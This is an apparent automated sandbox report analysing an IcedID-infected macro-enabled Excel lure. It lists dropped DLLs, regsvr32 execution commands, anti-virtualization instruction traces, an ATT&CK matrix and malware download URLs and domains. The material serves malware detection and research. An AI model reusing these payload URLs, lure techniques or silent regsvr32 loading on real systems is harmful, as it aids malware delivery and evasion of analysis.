Source: regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp	String found in binary or memory: https://www.amazon.jobs/aws
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://www.buzzsprout.com;
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com;
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://www.linkedin.com
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://www.twitch.tv/aws
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube-nocookie.com;
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://yt3.ggpht.com;

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443

E-Banking Fraud:

Yara detected IcedID

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000002.2089768444.000000000038E000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2089784049.00000000003B6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 2076, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Document image extraction number: 0	Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 0	Screenshot OCR: Enable Content button from the yellow bar above
Source: Document image extraction number: 1	Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 1	Screenshot OCR: Enable Content button from the yellow bar above

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\XTOWN.dll			Jump to dropped file

Source: C:\Windows\System32\regsvr32.exe

Code function: 4_2_00511678 NtQuerySystemInformation,

4_2_00511678

Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_00511810	4_2_00511810
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_000007FEF8FB15D0	4_2_000007FEF8FB15D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_000007FEF8FB41BF	4_2_000007FEF8FB41BF

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
Source: Joe Sandbox View	Dropped File: C:\Users\user\XTOWN.dll 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8

Source: workbook.xml

Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/><workbookPr filterPrivacy="1" defaultThemeVersion="164011"/><bookViews><workbookView xWindow="0" yWindow="0" windowWidth="22260" windowHeight="12645"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Sheet1" sheetId="8" r:id="rId2"/><sheet name="Sheet2" sheetId="4" r:id="rId3"/><sheet name="Sheet3" sheetId="2" r:id="rId4"/><sheet name="Sheet4" sheetId="3" r:id="rId5"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet3!$CA$13</definedName></definedNames><calcPr calcId="162913"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>

Source: 4.2.regsvr32.exe.110000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 4.2.regsvr32.exe.110000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 4.2.regsvr32.exe.510000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 00000004.00000002.2089712522.0000000000110000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240

Source: regsvr32.exe, 00000004.00000002.2091334487.0000000002F90000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSM@7/4@7/5

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Schedule-982347-Y6844315.xlsm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC81F.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Schedule-982347-Y6844315.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Schedule-982347-Y6844315.xlsm	Initial sample: OLE zip file path = xl/media/image1.png
Source: Schedule-982347-Y6844315.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: Schedule-982347-Y6844315.xlsm	Initial sample: OLE zip file path = xl/calcChain.xml

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: XTOWN.dll.0.dr	Static PE information: real checksum: 0x1baf8 should be: 0x19d85
Source: lsdfik[1].fml.0.dr	Static PE information: real checksum: 0x1baf8 should be: 0x19d85

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\XTOWN.dll			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\XTOWN.dll

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\XTOWN.dll

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Windows\System32\regsvr32.exe

Code function: 4_2_00511E50

4_2_00511E50

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\System32\regsvr32.exe	RDTSC instruction interceptor: First address: 0000000000511E71 second address: 0000000000511E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
Source: C:\Windows\System32\regsvr32.exe	RDTSC instruction interceptor: First address: 0000000000511EAB second address: 0000000000511EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc

Source: C:\Windows\System32\regsvr32.exe

Code function: 4_2_00512434 rdtsc

4_2_00512434

Source: C:\Windows\System32\regsvr32.exe

Code function: GetAdaptersInfo,GetAdaptersInfo,

4_2_005127BC

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml

Jump to dropped file

Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	Binary or memory string: <a href="/rds/vmware/?hp=tile&so-exp=below"> <i></i> <span>Amazon RDS on VMware</span> <cite>Automate on-premises database management</cite> </a>
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	Binary or memory string: <a href="/vmware/?hp=tile&so-exp=below"> <i></i> <span>VMware Cloud on AWS</span> <cite>Build a hybrid cloud without custom hardware</cite> </a>
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	Binary or memory string: <img src="//d1.awsstatic.com/Compute/VMware-Cloud-on-AWS_Icon_64_Squid.b126bc9cff89e6c44c4f5b9775521edd6743c2b8.png" alt="VMware-Cloud-on-AWS_Icon_64_Squid" title="VMware-Cloud-on-AWS_Icon_64_Squid" class="cq-dd-image" />
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	Binary or memory string: Migrate and extend VMware environments to the AWS Cloud
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	Binary or memory string: <a style="padding-left:20px; padding-bottom:0px; padding-right:45px;" href="/vmware/?hp=tile&tile=hybridsol" target="_blank" rel="noopener">
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	Binary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-h3 lb-title"> VMware Cloud on AWS</h3>
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	Binary or memory string: <a style="padding-left:30px; padding-bottom:0px; padding-right:30px;" href="/vmware/?hp=tile&tile=hybridsol" target="_blank" rel="noopener">

Source: C:\Windows\System32\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 4_2_00512434 rdtsc

4_2_00512434

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 104.21.37.209 80	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Domain query: astrocycle.download
Source: C:\Windows\System32\regsvr32.exe	Domain query: aws.amazon.com
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 13.224.92.73 187	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 4_2_005122DC LookupAccountNameW,

4_2_005122DC

Stealing of Sensitive Information:

Yara detected IcedID

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000002.2089768444.000000000038E000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2089784049.00000000003B6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 2076, type: MEMORY

Remote Access Functionality:

Yara detected IcedID

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000002.2089768444.000000000038E000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2089784049.00000000003B6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 2076, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting1	Path Interception	Process Injection11	Masquerading121	OS Credential Dumping	Security Software Discovery211	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution43	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer14	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection11	Security Account Manager	Account Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting1	NTDS	System Owner/User Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol124	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Regsvr321	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Network Configuration Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery22	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
astrocycle.download	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom	0%	URL Reputation	safe
https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom	0%	URL Reputation	safe
https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom	0%	URL Reputation	safe
https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom	0%	URL Reputation	safe
http://ocsp.rootg2.amazontrust.com08	0%	URL Reputation	safe
http://ocsp.rootg2.amazontrust.com08	0%	URL Reputation	safe
http://ocsp.rootg2.amazontrust.com08	0%	URL Reputation	safe
http://ocsp.rootg2.amazontrust.com08	0%	URL Reputation	safe
https://www.buzzsprout.com;	0%	Avira URL Cloud	safe
http://voopeople.fun/div/44376,8555986111.jpg	1%	Virustotal		Browse
http://voopeople.fun/div/44376,8555986111.jpg	0%	Avira URL Cloud	safe
http://crl.sca1b.amazontrust.com/sca1b.crl0	0%	URL Reputation	safe
http://crl.sca1b.amazontrust.com/sca1b.crl0	0%	URL Reputation	safe
http://crl.sca1b.amazontrust.com/sca1b.crl0	0%	URL Reputation	safe
http://crl.sca1b.amazontrust.com/sca1b.crl0	0%	URL Reputation	safe
http://astrocycle.download/nection	0%	Avira URL Cloud	safe
http://astrocycle.download/	1%	Virustotal		Browse
http://astrocycle.download/	0%	Avira URL Cloud	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe
http://ocsp.sca1b.amazontrust.com06	0%	URL Reputation	safe
http://ocsp.sca1b.amazontrust.com06	0%	URL Reputation	safe
http://ocsp.sca1b.amazontrust.com06	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://crl.rootg2.amazontrust.com/rootg2.crl0	0%	URL Reputation	safe
http://crl.rootg2.amazontrust.com/rootg2.crl0	0%	URL Reputation	safe
http://crl.rootg2.amazontrust.com/rootg2.crl0	0%	URL Reputation	safe
http://uppercilio.fun/div/44376,8555986111.jpg	0%	Avira URL Cloud	safe
http://o.ss2.us/0	0%	URL Reputation	safe
http://o.ss2.us/0	0%	URL Reputation	safe
http://o.ss2.us/0	0%	URL Reputation	safe
https://prod-us-west-2.csp-report.marketing.aws.dev/submit	0%	Avira URL Cloud	safe
http://thousandsyears.download/div/44376,8555986111.jpg	0%	Avira URL Cloud	safe
https://amazonwebservices.d2.sc.omtrdc.net	0%	Avira URL Cloud	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
uppercilio.fun	172.67.146.88	true	false		unknown
thousandsyears.download	104.21.52.111	true	false		unknown
voopeople.fun	172.67.194.117	true	false		unknown
astrocycle.download	104.21.37.209	true	true	1%, Virustotal, Browse	unknown
dr49lng3n1n2s.cloudfront.net	13.224.92.73	true	false		high
aws.amazon.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://voopeople.fun/div/44376,8555986111.jpg	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://astrocycle.download/	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://uppercilio.fun/div/44376,8555986111.jpg	false	Avira URL Cloud: safe	unknown
http://thousandsyears.download/div/44376,8555986111.jpg	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://twitter.com/awscloud	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://www.linkedin.com	regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra/1.0.385/directories	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/terms/?nc1=f_pr	regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp	false		high
https://img.youtube.com	regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	false		high
https://media.amazonwebservices.com	regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	false		high
https://dc.ads.linkedin.com/collect/?pid=3038&fmt=gif	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://c0.b0.p.awsstatic.com	regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	false		high
https://static-cdn.jtvnw.net	regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/cn/	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://a0.awsstatic.com/libra-css/images	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra/1.0.385/librastandardlib	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://anchor.fm	regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/psf/null	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://dts.podtrac.com	regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/ar/	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://pages.awscloud.com/zillow-case-study?hp=tile&story=zllw	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://pages.awscloud.com/communication-preferences?trk=homepage	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
http://ocsp.rootg2.amazontrust.com08	regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://aws.amazon.com/cn/?nc1=h_ls	regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://dpm.demdex.net	regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	false		high
https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&src=default	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/ru/	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://www.buzzsprout.com;	regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://aws.amazon.com/tw/?nc1=h_ls	regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser	regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp	false		high
https://i18n-string.us-west-2.prod.pricing.aws.a2z.com	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/ko/	regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/ru/?nc1=h_ls	regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	false		high
